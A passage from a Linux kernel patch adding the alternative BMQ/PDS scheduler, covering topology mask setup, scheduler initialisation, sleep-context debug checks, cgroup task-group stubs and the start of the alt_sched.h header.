++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++
++static int __init migration_init(void)
++{
++	sched_cpu_starting(smp_processor_id());
++	return 0;
++}
++early_initcall(migration_init);
++
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPU's synchronised, and interrupts disabled, the
++ * and caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_files,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..c32403ed82b6
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,668 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/profile.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetics problems.
++ * A weight of a cfs_rq is the sum of weights of which entities
++ * are queued on this cfs_rq, so a weight of a entity should not be
++ * too large, so as the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long prio;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For genenal cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler API which using in other kernel code
++ * It use the dummy rq_flags
++ * ToDo : BMQ need to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
